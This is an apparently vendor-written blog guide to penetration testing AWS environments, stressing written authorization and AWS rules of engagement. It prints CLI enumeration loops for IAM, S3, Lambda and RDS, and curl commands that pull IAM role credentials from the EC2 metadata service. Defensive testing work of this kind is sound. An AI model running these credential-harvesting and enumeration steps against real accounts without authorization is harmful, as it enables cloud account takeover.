Blog Thumbnail

The Ultimate AWS Penetration Testing Handbook

When it comes to using AWS, keeping cloud security tight is a big deal for companies. They rely on penetration testing to find and fix any weak spots in their security. AWS offers a reliable and scalable place for cloud computing, which is why so many people use it. Knowing how crucial penetration testing is can help these organizations keep their important data safe from breaches that happen online.

What is AWS Penetration Testing?

AWS pentesting is a proactive security assessment technique that involves simulating real-world attacks on computer systems, networks, applications, or other digital assets. It helps improve the overall security posture of the AWS infrastructure, validates the effectiveness of security controls, and assists in meeting compliance requirements.

Penetration testing on AWS allows organizations to proactively identify and address security vulnerabilities before they are exploited by malicious actors.

Benefits of AWS Penetration Testing

  • Improved security posture

  • Validated security controls

  • Compliance with regulations

  • Proactive identification and remediation of vulnerabilities

AWS Shared Responsibility Model

When it comes to security testing on AWS, it follows a model where both Amazon and the customers have certain responsibilities. Here's a breakdown of these responsibilities:

  • Amazon's Responsibilities: Amazon focuses on securing the infrastructure that runs all of the services offered in the AWS Cloud Computing Suite. This infrastructure includes the physical hardware, supporting software, networking, and facilities that run AWS Cloud services.

  • Customer's Responsibilities: Customers are responsible for maintaining the security of the guest operating system (including updates and security patches), other associated application software, and the configuration of the AWS provided security group firewall. Customers do not require prior approval from AWS to pentest the approved services discussed in the next section.

What Are You Allowed and Not Allowed to Test in AWS?

When performing penetration testing in AWS, it is crucial to understand what is permitted and what is not permitted to ensure compliance with the terms and conditions of AWS. While AWS encourages security testing, certain limitations and guidelines must be followed.

Allowed:

  • Web application scanning

  • Port scanning

  • Injections

  • Exploitation

  • Vulnerability scanning or checks

  • Forgery

  • Fuzzing

Not Allowed:

  • DNS zone walking, hijacking, or pharming

  • Protocol flooding

  • Port flooding

  • Denial of Service (DoS) and Distributed Denial of Service (DDoS)

  • Simulated DoS and DDoS

  • Request flooding (API request flooding, login request flooding)

Prerequisites to Testing on AWS

Before conducting a pentest on AWS, it's recommended to describe the following aspects:

  • The scope of the pentest: This includes the target system.

  • The kind of test to be carried out: This could be a black-box test, white-box test, or gray-box test.

  • Requirements of the test: These should be mutually decided between stakeholders and the pentesting contractor.

  • A protocol the pentester should follow in case they discover a vulnerability: This helps ensure responsible disclosure and remediation.

  • A schedule for the pentest: This will help manage expectations and resources.

  • Written authorization by system owners for pentesters to conduct the test: This is crucial to ensure compliance and avoid any misunderstandings.

Three Main Types of AWS Testing

  • Testing on the Cloud: An example of this type of test would be a virtualized system that has been moved from on-premise to the cloud.

  • Testing in the Cloud: Testing systems within the cloud that are not exposed publicly. An example would be testing the server hosting an application.

  • Testing the Cloud Console: A configuration test of the cloud console. Examples would be looking at user accounts, their permissions, and access management configurations.

How to Perform Penetration Testing on AWS

Here are the general steps to perform penetration testing on AWS:

  1. Seek Appropriate Authorization: Before conducting any testing, ensure you have explicit written authorization from the AWS account owner or organization.

  2. Define Scope and Goals: Identify the target systems, applications, and AWS services to be tested. Consider any specific compliance requirements or sensitive data that must be protected.

  3. Set Up Testing Environment: Create a separate testing environment within AWS, which is different from the production environment to avoid unintentional interruptions. This includes setting up virtual instances, networks, and security groups specifically for the pentest.

  4. Map the Attack Surface: Gather as much information about the AWS environment as you can. This includes identifying services, instances, subnets, S3 buckets, Identity and Access Management (IAM) roles, and other potentially vulnerable components. Some of the techniques you can use are network scanning, vulnerability scanning, and social engineering.

  5. Perform Vulnerability Assessment: This is the main goal.

Preparing for an AWS Penetration Test

A cloud penetration test in AWS typically follows the same phases as a traditional penetration test but requires additional considerations specific to cloud services. Here's an overview of the phases involved in a cloud penetration test:

  1. Prerequisites and Scope: Define the scope of the penetration test, including which services and resources will be tested, and ensure compliance with AWS's Shared Responsibility Model and Customer Support Policy for penetration testing.

  2. Attack Surface Identification: Identify and enumerate the cloud services in use within the scope of the test.

  3. Testing: Execute the penetration test against the identified services, focusing on vulnerabilities specific to cloud environments.

Prerequisites and Scope

Before starting the technical part of the penetration test, it is essential to define the scope and boundaries of the assessment. Key considerations include:

  • Service Inventory: Determine which AWS services are being used.

  • IAM Policies: Identify non-standard IAM policies and the number of policies and accounts.

  • Shared Responsibility Model: Understand that some aspects of AWS infrastructure cannot be tested without explicit permission.

AWS’s Shared Responsibility Model delineates that AWS is responsible for the security "of" the cloud (infrastructure and services), while the customer is responsible for the security "in" the cloud (configuring services securely).

Basics to Interact with AWS

Interacting with AWS during a penetration test often involves using the AWS Command Line Interface (CLI). The AWS CLI is a critical tool for accessing and managing AWS services, especially when AWS authentication credentials are available.

AWS Cloud Services Overview

Amazon Web Services (AWS) offers a wide range of cloud services, including storage, databases, and compute power. With data centers across 26 regions, AWS supports global access to its services.

Rules of Engagement for AWS Penetration Tests

AWS’s Customer Support Policy outlines the rules of engagement for penetration tests. Some services, like S3-hosted applications, can be tested without prior approval, while others, like Route 53 DNS and Denial of Service (DoS) attacks, are prohibited.

Common AWS Penetration Testing Techniques

1. External Reconnaissance

External reconnaissance involves gathering information about the target AWS environment using both standard penetration testing tools and AWS-specific methods. Examples include:

  • AWS Marketplace: Search for the target organization to potentially discover account IDs.

  • Brute-Forcing Account ID: Use the AWS Sign-In URL to guess account IDs.

  • Public Snapshots and AMI Images: Search for publically available Elastic Block Store (EBS) snapshots and Amazon Machine Images (AMIs) that might reveal sensitive data.

2. Enumeration

Identify IAM Policies and Roles

Examine IAM policies and roles to identify overly permissive policies.

aws iam list-policies

aws iam get-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

aws iam list-attached-user-policies --user-name <username>

aws iam list-roles

Security Groups and Network Configuration

Check for misconfigured security groups and network ACLs.

aws ec2 describe-security-groups

aws ec2 describe-network-acls

aws ec2 describe-subnets

  1. Vulnerability Assessment

#### S3 Bucket Permissions

Check for publicly accessible S3 buckets or those with weak permissions.  
  

aws s3api list\-buckets --query "Buckets\[\].Name"

for bucket in $(aws s3api list\-buckets --query "Buckets\[\].Name" --output text); do

    echo "Checking permissions for bucket: $bucket"

    aws s3api get\-bucket\-acl --bucket $bucket

    aws s3api get\-bucket\-policy --bucket $bucket

done

Lambda Functions

Inspect Lambda functions for insecure configurations or sensitive information in code.

aws lambda list\-functions

for func in $(aws lambda list\-functions --query "Functions\[\].FunctionName" --output text); do

    echo "Checking code for Lambda function: $func"

    aws lambda get\-function --function\-name $func

done

RDS Security

Check for RDS instances with weak configurations or public accessibility.

aws rds describe\-db\-instances

for db in $(aws rds describe\-db\-instances --query "DBInstances\[\].DBInstanceIdentifier" --output text); do

    aws rds describe\-db\-instances --db\-instance\-identifier $db

done

4. Local Filesystem Checks

When interactive access to an AWS service, such as an EC2 instance, is gained, common local filesystem checks are performed:

  • Discovery of Sensitive Information: Look for passwords, configuration files, and documentation that might reveal more about the environment.

  • Privilege Escalation: Identify misconfigurations or exploits that could elevate privileges.

  • Pivoting: Use port scanning and other techniques to move laterally within the network.

Additionally, check for:

  • AWS Access Credentials: Search for credentials in directories and application files.

  • AWS Metadata Service: Access the metadata service at http://169.254.169.254/ to gather instance-specific information and potential IAM roles.

##### Example: Accessing AWS Metadata Service

TOKEN\=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/

###   

5. AWS Security Tokens

AWS Security Tokens provide temporary, limited-privilege access. These tokens can be exploited if they are not securely managed. For example, EC2 instances with assigned IAM roles can be queried for temporary credentials via the metadata service.

##### Example: Retrieving IAM Role Credentials

TOKEN\=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

IAM\_ROLE\=$(curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)

curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM\_ROLE

6. AWS Security Token Permission Enumeration

Once AWS credentials are obtained, enumerate the permissions to understand what actions the compromised user or role can perform. This involves listing attached role policies and their permissions.

##### Example: Enumerating Permissions

aws sts get\-caller\-identity

aws iam list\-attached\-role\-policies --role\-name <ROLE\_NAME\>

aws iam list\-policy\-versions --policy\-arn <POLICY\_ARN\>

Suggested Tools for AWS Penetration Testing

Here are some recommended tools for conducting AWS penetration tests:

  • AWS CLI: A unified command line interface to manage AWS services.

  • Prowler: An open-source security tool for performing AWS security assessments and audits.

  • AWS Consoler: Converts AWS CLI credentials into AWS console access.

  • awsenum: Identifies permissions by brute-forcing different AWS operations.

  • Enumerate IAM: Lists IAM permissions.

  • Scout Suite: A multi-cloud security-auditing tool.

  • WeirdAAL: AWS Attack Library.

  • Hacktricks Cloud AWS Pentesting: A collection of AWS attack vectors and methodologies.

Conclusion

Performing a penetration test in AWS involves understanding the specific services in use, the configurations and permissions set within the environment, and leveraging various tools and techniques to identify vulnerabilities. By following a structured approach and adhering to AWS's rules of engagement, security professionals can effectively assess and enhance the security posture of AWS environments.


Image Not Found

Robin Joseph

Head of Security testing

Don’t Wait for a Breach to Take Action.

Proactive pentesting is the best defense. Let’s secure your systems